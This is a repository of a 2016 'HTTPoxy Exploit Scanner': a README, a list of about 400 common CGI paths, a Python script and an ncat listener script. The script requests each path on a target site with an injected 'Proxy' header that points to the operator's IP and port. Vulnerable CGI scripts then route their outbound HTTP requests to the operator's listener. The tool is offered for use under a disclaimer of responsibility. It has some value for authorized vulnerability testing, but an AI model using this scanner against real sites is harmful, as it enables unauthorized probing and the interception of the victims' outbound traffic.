├── README.md ├── cgi_list.txt ├── httpoxyscan.py └── listener.sh /README.md: -------------------------------------------------------------------------------- 1 | # HTTPoxy Exploit Scanner 2 | 3 | by 1N3 @CrowdShield (https://crowdshield.com) 4 | Last Updated: 20160720 5 | 6 | ## ABOUT: 7 | PoC/Exploit scanner to scan common CGI files on a target URL for the HTTPoxy vulnerability. Httpoxy is a set of vulnerabilities that affect application code running in CGI, or CGI-like environments. For more details, go to https://httpoxy.org. 8 | 9 | ## REQUIREMENTS: 10 | Requires ncat, which listener.sh runs as the reverse listener. 11 | 12 | ## USAGE: 13 | ``` 14 | ./httpoxyscan.py https://target.com cgi_list.txt 10.1.2.243 3000 15 | ``` 16 | This will scan https://target.com with a list of common CGI files while injecting a Proxy header that points back to a given IP:PORT. If a scanned CGI script uses that header as the proxy for an outbound HTTP request, the reverse listener will catch the incoming connection, which confirms the remote site is vulnerable. The script does not check for the connection itself; it shows up in the ncat output. 17 | 18 | ## DISCLAIMER: 19 | I take no responsibility for wrongdoing or misuse of this exploit. 
20 | 21 | -------------------------------------------------------------------------------- /cgi_list.txt: -------------------------------------------------------------------------------- 1 | / 2 | /admin.cgi 3 | /administrator.cgi 4 | /agora.cgi 5 | /aktivate/cgi-bin/catgy.cgi 6 | /analyse.cgi 7 | /apps/web/vs_diag.cgi 8 | /axis-cgi/buffer/command.cgi 9 | /b2-include/b2edit.showposts.php 10 | /bandwidth/index.cgi 11 | /bigconf.cgi 12 | /cartcart.cgi 13 | /cart.cgi 14 | /ccbill/whereami.cgi 15 | /cgi-bin/14all-1.1.cgi 16 | /cgi-bin/14all.cgi 17 | /cgi-bin/a1disp3.cgi 18 | /cgi-bin/a1stats/a1disp3.cgi 19 | /cgi-bin/a1stats/a1disp4.cgi 20 | /cgi-bin/addbanner.cgi 21 | /cgi-bin/add_ftp.cgi 22 | /cgi-bin/adduser.cgi 23 | /cgi-bin/admin/admin.cgi 24 | /cgi-bin/admin.cgi 25 | /cgi-bin/admin/getparam.cgi 26 | /cgi-bin/adminhot.cgi 27 | /cgi-bin/admin.pl 28 | /cgi-bin/admin/setup.cgi 29 | /cgi-bin/adminwww.cgi 30 | /cgi-bin/af.cgi 31 | /cgi-bin/aglimpse.cgi 32 | /cgi-bin/alienform.cgi 33 | /cgi-bin/AnyBoard.cgi 34 | /cgi-bin/architext_query.cgi 35 | /cgi-bin/astrocam.cgi 36 | /cgi-bin/AT-admin.cgi 37 | /cgi-bin/AT-generate.cgi 38 | /cgi-bin/auction/auction.cgi 39 | /cgi-bin/auktion.cgi 40 | /cgi-bin/ax-admin.cgi 41 | /cgi-bin/ax.cgi 42 | /cgi-bin/axs.cgi 43 | /cgi-bin/badmin.cgi 44 | /cgi-bin/banner.cgi 45 | /cgi-bin/bannereditor.cgi 46 | /cgi-bin/bb-ack.sh 47 | /cgi-bin/bb-histlog.sh 48 | /cgi-bin/bb-hist.sh 49 | /cgi-bin/bb-hostsvc.sh 50 | /cgi-bin/bb-replog.sh 51 | /cgi-bin/bb-rep.sh 52 | /cgi-bin/bbs_forum.cgi 53 | /cgi-bin/bigconf.cgi 54 | /cgi-bin/bizdb1-search.cgi 55 | /cgi-bin/blog/mt-check.cgi 56 | /cgi-bin/blog/mt-load.cgi 57 | /cgi-bin/bnbform.cgi 58 | /cgi-bin/book.cgi 59 | /cgi-bin/boozt/admin/index.cgi 60 | /cgi-bin/bsguest.cgi 61 | /cgi-bin/bslist.cgi 62 | /cgi-bin/build.cgi 63 | /cgi-bin/bulk/bulk.cgi 64 | /cgi-bin/cached_feed.cgi 65 | /cgi-bin/cachemgr.cgi 66 | /cgi-bin/calendar/index.cgi 67 | /cgi-bin/cartmanager.cgi 68 | /cgi-bin/cbmc/forums.cgi 69 | 
/cgi-bin/ccvsblame.cgi 70 | /cgi-bin/c_download.cgi 71 | /cgi-bin/cgforum.cgi 72 | /cgi-bin/.cgi 73 | /cgi-bin/cgi_process 74 | /cgi-bin/classified.cgi 75 | /cgi-bin/classifieds.cgi 76 | /cgi-bin/classifieds/classifieds.cgi 77 | /cgi-bin/classifieds/index.cgi 78 | /cgi-bin/.cobalt/alert/service.cgi 79 | /cgi-bin/.cobalt/message/message.cgi 80 | /cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi 81 | /cgi-bin/commandit.cgi 82 | /cgi-bin/commerce.cgi 83 | /cgi-bin/common/listrec.pl 84 | /cgi-bin/compatible.cgi 85 | /cgi-bin/Count.cgi 86 | /cgi-bin/csChatRBox.cgi 87 | /cgi-bin/csGuestBook.cgi 88 | /cgi-bin/csLiveSupport.cgi 89 | /cgi-bin/CSMailto.cgi 90 | /cgi-bin/CSMailto/CSMailto.cgi 91 | /cgi-bin/csNews.cgi 92 | /cgi-bin/csNewsPro.cgi 93 | /cgi-bin/csPassword.cgi 94 | /cgi-bin/csPassword/csPassword.cgi 95 | /cgi-bin/csSearch.cgi 96 | /cgi-bin/csv_db.cgi 97 | /cgi-bin/cvsblame.cgi 98 | /cgi-bin/cvslog.cgi 99 | /cgi-bin/cvsquery.cgi 100 | /cgi-bin/cvsqueryform.cgi 101 | /cgi-bin/day5datacopier.cgi 102 | /cgi-bin/day5datanotifier.cgi 103 | /cgi-bin/db_manager.cgi 104 | /cgi-bin/dbman/db.cgi 105 | /cgi-bin/dcforum.cgi 106 | /cgi-bin/dcshop.cgi 107 | /cgi-bin/dfire.cgi 108 | /cgi-bin/diagnose.cgi 109 | /cgi-bin/dig.cgi 110 | /cgi-bin/directorypro.cgi 111 | /cgi-bin/download.cgi 112 | /cgi-bin/e87_Ba79yo87.cgi 113 | /cgi-bin/emu/html/emumail.cgi 114 | /cgi-bin/emumail.cgi 115 | /cgi-bin/emumail/emumail.cgi 116 | /cgi-bin/enter.cgi 117 | /cgi-bin/environ.cgi 118 | /cgi-bin/ezadmin.cgi 119 | /cgi-bin/ezboard.cgi 120 | /cgi-bin/ezman.cgi 121 | /cgi-bin/ezshopper2/loadpage.cgi 122 | /cgi-bin/ezshopper3/loadpage.cgi 123 | /cgi-bin/ezshopper/loadpage.cgi 124 | /cgi-bin/ezshopper/search.cgi 125 | /cgi-bin/faqmanager.cgi 126 | /cgi-bin/FileSeek2.cgi 127 | /cgi-bin/FileSeek.cgi 128 | /cgi-bin/finger.cgi 129 | /cgi-bin/flexform.cgi 130 | /cgi-bin/fom.cgi 131 | /cgi-bin/fom/fom.cgi 132 | /cgi-bin/FormHandler.cgi 133 | /cgi-bin/FormMail.cgi 134 | /cgi-bin/gbadmin.cgi 135 | 
/cgi-bin/gbook/gbook.cgi 136 | /cgi-bin/generate.cgi 137 | /cgi-bin/getdoc.cgi 138 | /cgi-bin/gH.cgi 139 | /cgi-bin/gm-authors.cgi 140 | /cgi-bin/gm.cgi 141 | /cgi-bin/gm-cplog.cgi 142 | /cgi-bin/guestbook.cgi 143 | /cgi-bin/handler 144 | /cgi-bin/handler.cgi 145 | /cgi-bin/handler/netsonar 146 | /cgi-bin/hitview.cgi 147 | /cgi-bin/hsx.cgi 148 | /cgi-bin/html2chtml.cgi 149 | /cgi-bin/html2wml.cgi 150 | /cgi-bin/htsearch.cgi 151 | /cgi-bin/icat 152 | /cgi-bin/if/admin/nph-build.cgi 153 | /cgi-bin/ikonboard/help.cgi 154 | /cgi-bin/ImageFolio/admin/admin.cgi 155 | /cgi-bin/imageFolio.cgi 156 | /cgi-bin/index.cgi 157 | /cgi-bin/infosrch.cgi 158 | /cgi-bin/jammail.pl 159 | /cgi-bin/journal.cgi 160 | /cgi-bin/lastlines.cgi 161 | /cgi-bin/loadpage.cgi 162 | /cgi-bin/login.cgi 163 | /cgi-bin/logit.cgi 164 | /cgi-bin/log-reader.cgi 165 | /cgi-bin/lookwho.cgi 166 | /cgi-bin/lwgate.cgi 167 | /cgi-bin/MachineInfo 168 | /cgi-bin/MachineInfo 169 | /cgi-bin/magiccard.cgi 170 | /cgi-bin/mail/emumail.cgi 171 | /cgi-bin/maillist.cgi 172 | /cgi-bin/mailnews.cgi 173 | /cgi-bin/mail/nph-mr.cgi 174 | /cgi-bin/main.cgi 175 | /cgi-bin/main_menu.pl 176 | /cgi-bin/man.sh 177 | /cgi-bin/mini_logger.cgi 178 | /cgi-bin/mmstdod.cgi 179 | /cgi-bin/moin.cgi 180 | /cgi-bin/mojo/mojo.cgi 181 | /cgi-bin/mrtg.cgi 182 | /cgi-bin/mt.cgi 183 | /cgi-bin/mt/mt.cgi 184 | /cgi-bin/mt/mt-check.cgi 185 | /cgi-bin/mt/mt-load.cgi 186 | /cgi-bin/mt-static/mt-check.cgi 187 | /cgi-bin/mt-static/mt-load.cgi 188 | /cgi-bin/musicqueue.cgi 189 | /cgi-bin/myguestbook.cgi 190 | /cgi-bin/.namazu.cgi 191 | /cgi-bin/nbmember.cgi 192 | /cgi-bin/netauth.cgi 193 | /cgi-bin/netpad.cgi 194 | /cgi-bin/newsdesk.cgi 195 | /cgi-bin/nlog-smb.cgi 196 | /cgi-bin/nph-emumail.cgi 197 | /cgi-bin/nph-exploitscanget.cgi 198 | /cgi-bin/nph-publish.cgi 199 | /cgi-bin/nph-test.cgi 200 | /cgi-bin/pagelog.cgi 201 | /cgi-bin/pbcgi.cgi 202 | /cgi-bin/perlshop.cgi 203 | /cgi-bin/pfdispaly.cgi 204 | /cgi-bin/pfdisplay.cgi 205 | /cgi-bin/phf.cgi 206 
| /cgi-bin/photo/manage.cgi 207 | /cgi-bin/photo/protected/manage.cgi 208 | /cgi-bin/php-cgi 209 | /cgi-bin/php.cgi 210 | /cgi-bin/php.fcgi 211 | /cgi-bin/ping.sh 212 | /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi 213 | /cgi-bin/pollssi.cgi 214 | /cgi-bin/postcards.cgi 215 | /cgi-bin/powerup/r.cgi 216 | /cgi-bin/printenv 217 | /cgi-bin/probecontrol.cgi 218 | /cgi-bin/profile.cgi 219 | /cgi-bin/publisher/search.cgi 220 | /cgi-bin/quickstore.cgi 221 | /cgi-bin/quizme.cgi 222 | /cgi-bin/ratlog.cgi 223 | /cgi-bin/r.cgi 224 | /cgi-bin/register.cgi 225 | /cgi-bin/replicator/webpage.cgi/ 226 | /cgi-bin/responder.cgi 227 | /cgi-bin/robadmin.cgi 228 | /cgi-bin/robpoll.cgi 229 | /cgi-bin/rtpd.cgi 230 | /cgi-bin/sbcgi/sitebuilder.cgi 231 | /cgi-bin/scoadminreg.cgi 232 | /cgi-bin-sdb/printenv 233 | /cgi-bin/sdbsearch.cgi 234 | /cgi-bin/search 235 | /cgi-bin/search.cgi 236 | /cgi-bin/search/search.cgi 237 | /cgi-bin/sendform.cgi 238 | /cgi-bin/shop.cgi 239 | /cgi-bin/shopper.cgi 240 | /cgi-bin/shopplus.cgi 241 | /cgi-bin/showcheckins.cgi 242 | /cgi-bin/simplestguest.cgi 243 | /cgi-bin/simplestmail.cgi 244 | /cgi-bin/smartsearch.cgi 245 | /cgi-bin/smartsearch/smartsearch.cgi 246 | /cgi-bin/snorkerz.bat 247 | /cgi-bin/snorkerz.bat 248 | /cgi-bin/snorkerz.cmd 249 | /cgi-bin/snorkerz.cmd 250 | /cgi-bin/sojourn.cgi 251 | /cgi-bin/spin_client.cgi 252 | /cgi-bin/start.cgi 253 | /cgi-bin/status 254 | /cgi-bin/status_cgi 255 | /cgi-bin/store/agora.cgi 256 | /cgi-bin/store.cgi 257 | /cgi-bin/store/index.cgi 258 | /cgi-bin/survey.cgi 259 | /cgi-bin/sync.cgi 260 | /cgi-bin/talkback.cgi 261 | /cgi-bin/technote/main.cgi 262 | /cgi-bin/test2.pl 263 | /cgi-bin/test-cgi 264 | /cgi-bin/test.cgi 265 | /cgi-bin/testing_whatever 266 | /cgi-bin/test/test.cgi 267 | /cgi-bin/tidfinder.cgi 268 | /cgi-bin/tigvote.cgi 269 | /cgi-bin/title.cgi 270 | /cgi-bin/top.cgi 271 | /cgi-bin/traffic.cgi 272 | /cgi-bin/troops.cgi 273 | /cgi-bin/ttawebtop.cgi/ 274 | /cgi-bin/ultraboard.cgi 275 | /cgi-bin/upload.cgi 276 | 
/cgi-bin/urlcount.cgi 277 | /cgi-bin/viewcvs.cgi 278 | /cgi-bin/view_help.cgi 279 | /cgi-bin/viralator.cgi 280 | /cgi-bin/virgil.cgi 281 | /cgi-bin/vote.cgi 282 | /cgi-bin/vpasswd.cgi 283 | /cgi-bin/way-board.cgi 284 | /cgi-bin/way-board/way-board.cgi 285 | /cgi-bin/webbbs.cgi 286 | /cgi-bin/webcart/webcart.cgi 287 | /cgi-bin/webdist.cgi 288 | /cgi-bin/webif.cgi 289 | /cgi-bin/webmail/html/emumail.cgi 290 | /cgi-bin/webmap.cgi 291 | /cgi-bin/webspirs.cgi 292 | /cgi-bin/Web_Store/web_store.cgi 293 | /cgi-bin/whois.cgi 294 | /cgi-bin/whois_raw.cgi 295 | /cgi-bin/whois/whois.cgi 296 | /cgi-bin/wrap 297 | /cgi-bin/wrap.cgi 298 | /cgi-bin/wwwboard.cgi.cgi 299 | /cgi-bin/YaBB/YaBB.cgi 300 | /cgi-bin/zml.cgi 301 | /cgi-mod/index.cgi 302 | /cgis/wwwboard/wwwboard.cgi 303 | /cgi-sys/addalink.cgi 304 | /cgi-sys/defaultwebpage.cgi 305 | /cgi-sys/domainredirect.cgi 306 | /cgi-sys/entropybanner.cgi 307 | /cgi-sys/entropysearch.cgi 308 | /cgi-sys/FormMail-clone.cgi 309 | /cgi-sys/helpdesk.cgi 310 | /cgi-sys/mchat.cgi 311 | /cgi-sys/randhtml.cgi 312 | /cgi-sys/realhelpdesk.cgi 313 | /cgi-sys/realsignup.cgi 314 | /cgi-sys/signup.cgi 315 | /connector.cgi 316 | /cp/rac/nsManager.cgi 317 | /create_release.sh 318 | /CSNews.cgi 319 | /csPassword.cgi 320 | /dcadmin.cgi 321 | /dcboard.cgi 322 | /dcforum.cgi 323 | /dcforum/dcforum.cgi 324 | /debuff.cgi 325 | /debug.cgi 326 | /details.cgi 327 | /edittag/edittag.cgi 328 | /emumail.cgi 329 | /enter_buff.cgi 330 | /enter_bug.cgi 331 | /ez2000/ezadmin.cgi 332 | /ez2000/ezboard.cgi 333 | /ez2000/ezman.cgi 334 | /fcgi-bin/echo 335 | /fcgi-bin/echo 336 | /fcgi-bin/echo2 337 | /fcgi-bin/echo2 338 | /Gozila.cgi 339 | /hitmatic/analyse.cgi 340 | /hp_docs/cgi-bin/index.cgi 341 | /html/cgi-bin/cgicso 342 | /html/cgi-bin/cgicso 343 | /index.cgi 344 | /info.cgi 345 | /infosrch.cgi 346 | /login.cgi 347 | /mailview.cgi 348 | /main.cgi 349 | /megabook/admin.cgi 350 | /ministats/admin.cgi 351 | /mods/apage/apage.cgi 352 | /_mt/mt.cgi 353 | /musicqueue.cgi 
354 | /ncbook.cgi 355 | /newpro.cgi 356 | /newsletter.sh 357 | /oem_webstage/cgi-bin/oemapp_cgi 358 | /page.cgi 359 | /parse_xml.cgi 360 | /photodata/manage.cgi 361 | /photo/manage.cgi 362 | /print.cgi 363 | /process_buff.cgi 364 | /process_bug.cgi 365 | /pub/english.cgi 366 | /quikmail/nph-emumail.cgi 367 | /quikstore.cgi 368 | /reviews/newpro.cgi 369 | /ROADS/cgi-bin/search.pl 370 | /sample01.cgi 371 | /sample02.cgi 372 | /sample03.cgi 373 | /sample04.cgi 374 | /sampleposteddata.cgi 375 | /scancfg.cgi 376 | /scancfg.cgi 377 | /servers/link.cgi 378 | /setpasswd.cgi 379 | /SetSecurity.shm 380 | /shop/member_html.cgi 381 | /shop/normal_html.cgi 382 | /site_searcher.cgi 383 | /siteUserMod.cgi 384 | /submit.cgi 385 | /technote/print.cgi 386 | /template.cgi 387 | /test.cgi 388 | /ucsm/isSamInstalled.cgi 389 | /upload.cgi 390 | /userreg.cgi 391 | /users/scripts/submit.cgi 392 | /vood/cgi-bin/vood_view.cgi 393 | /Web_Store/web_store.cgi 394 | /webtools/bonsai/ccvsblame.cgi 395 | /webtools/bonsai/cvsblame.cgi 396 | /webtools/bonsai/cvslog.cgi 397 | /webtools/bonsai/cvsquery.cgi 398 | /webtools/bonsai/cvsqueryform.cgi 399 | /webtools/bonsai/showcheckins.cgi 400 | /wwwadmin.cgi 401 | /wwwboard.cgi 402 | /wwwboard/wwwboard.cgi 403 | -------------------------------------------------------------------------------- /httpoxyscan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # HTTPoxy Exploit Scanner by 1N3 @CrowdShield 3 | # Last Updated: 20160720 4 | # https://crowdshield.com 5 | # 6 | # ABOUT: PoC/Exploit scanner to scan common CGI files on a target URL for the HTTPoxy vulnerability. Httpoxy is a set of vulnerabilities that affect application code running in CGI, or CGI-like environments. For more details, go to https://httpoxy.org. 
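#
# REQUIREMENTS: requires ncat to establish reverse session
#
# USAGE: ./httpoxyscan.py https://target.com cgi_list.txt 10.1.2.243 3000
# *** This will scan https://target.com with a list of common CGI files while injecting a Proxy header back to a given IP:PORT. A reverse listener will catch the incoming connection to confirm the remote site is vulnerable.
#
# DISCLAIMER: I take no responsibility for wrong doing or misuse of this exploit.
#

import getopt
import os
import ssl
import subprocess
import sys
import time
import urllib
import urllib2
from array import *
from subprocess import call

import requests

# Certificate and hostname verification are switched off for every request,
# so the identity of the answering server is never checked. The scan only
# sends requests and discards the responses; do not reuse this context for
# anything that trusts response content.
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE


class bcolors:
    """ANSI escape sequences used to colour terminal output."""
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'


# ASCII-art banner rows, kept exactly as they appear in the listing.
_BANNER = (
    " _____ _____ ___ __ ",
    " /\ /\/__ \/__ \/ _ \_____ ___ _/ _\ ___ __ _ _ __ ",
    " / /_/ / / /\/ / /\/ /_)/ _ \ \/ / | | \ \ / __/ _` | '_ \ ",
    "/ __ / / / / / / ___/ (_) > <| |_| |\ \ (_| (_| | | | |",
    "\/ /_/ \/ \/ \/ \___/_/\_\\__, |\__/\___\__,_|_| |_|",
    " |___/ ",
)


def _print_banner(tagline):
    """Print the banner rows followed by *tagline*, all in blue."""
    for row in _BANNER + (tagline,):
        print(bcolors.OKBLUE + row + bcolors.ENDC)


def main(argv):
    """Request each wordlist path from the target with a Proxy header attached.

    argv is [script, target_url, wordlist_path, listener_ip, listener_port].
    With fewer than five entries the usage text is printed and the process
    exits with status 0.

    The script starts listener.sh (ncat listening on listener_port), sends one
    request per wordlist entry carrying ``Proxy: listener_ip:listener_port``,
    then stops the listener. Responses are read and thrown away: the script
    never inspects them and never checks whether anything connected back. An
    inbound connection is visible only in ncat's verbose output. A connection
    means the requested script made an outbound HTTP request through the
    supplied proxy; the absence of one is not proof that a path is unaffected,
    since only scripts that make such a request while handling the call would
    connect.
    """
    if len(argv) < 5:
        _print_banner(" HTTPoxy Exploit Scanner by 1N3 @ https://crowdshield.com")
        print(bcolors.WARNING + "[*] Usage: %s http://target.com cgi_list.txt listener_ip listener_port" % (argv[0]) + bcolors.ENDC)
        print("")
        sys.exit(0)

    url = argv[1]          # target base URL
    wordlist = argv[2]     # file with one request path per line
    listen_ip = argv[3]    # address placed in the Proxy header
    listen_port = argv[4]  # port placed in the Proxy header and given to ncat

    _print_banner(" + -- --=[HTTPoxy Exploit Scanner by 1N3 @ https://crowdshield.com")
    print("")

    # Read the paths once, without the trailing newline that readlines() left
    # on every entry (it ended up inside the request URL), and skip blanks.
    with open(wordlist) as f:
        paths = [line.strip() for line in f if line.strip()]

    # The port reaches a child process and an HTTP header, so accept only a
    # plain port number.
    if not listen_port.isdigit() or not 0 < int(listen_port) < 65536:
        print(bcolors.FAIL + "[!] listener_port must be a number between 1 and 65535" + bcolors.ENDC)
        sys.exit(1)

    # Start the listener with an argument list instead of a shell string, so
    # the command-line value is never parsed by a shell here. listener.sh is
    # resolved relative to the current directory and backgrounds ncat itself,
    # so this call returns at once.
    # NOTE(review): listener.sh passes no bind address to ncat, so the port is
    # reachable on every interface of this host while the scan runs.
    print(bcolors.WARNING + "[*] Starting reverse listener on port " + listen_port + bcolors.ENDC)
    subprocess.call(['bash', 'listener.sh', listen_port])
    time.sleep(3)

    try:
        print(bcolors.WARNING + "[*] Scanning target: " + url + "" + bcolors.ENDC)
        for path in paths:
            req_url = url + path
            sys.stdout.write("[+] Sending request: " + req_url + "\n")
            req = urllib2.Request(req_url)
            req.add_header('Proxy', listen_ip + ":" + listen_port)
            req.add_header('User-Agent', 'HTTPoxyScan by 1N3')
            try:
                resp = urllib2.urlopen(req, context=ctx)
                try:
                    resp.read()
                finally:
                    resp.close()
            except Exception as e:
                # Best effort: urllib2 raises for HTTP error statuses as well
                # as connection failures; report and move to the next path.
                print("Exception: " + str(e))
        print(bcolors.WARNING + "[*] Scan complete!" + bcolors.ENDC)
    finally:
        # Always take the listener down, even if the scan is interrupted, so
        # the port does not stay open on this host.
        # NOTE: killall ends every ncat process this user may signal, not only
        # the listener started above.
        print(bcolors.WARNING + "[*] Killing reverse listener..." + bcolors.ENDC)
        time.sleep(5)
        subprocess.call(['killall', 'ncat'])
    print(bcolors.WARNING + "[*] Done!" + bcolors.ENDC)


if __name__ == "__main__":
    main(sys.argv)
-------------------------------------------------------------------------------- /listener.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | killall ncat 2> /dev/null 3 | ncat -klvvp $1 & 4 | --------------------------------------------------------------------------------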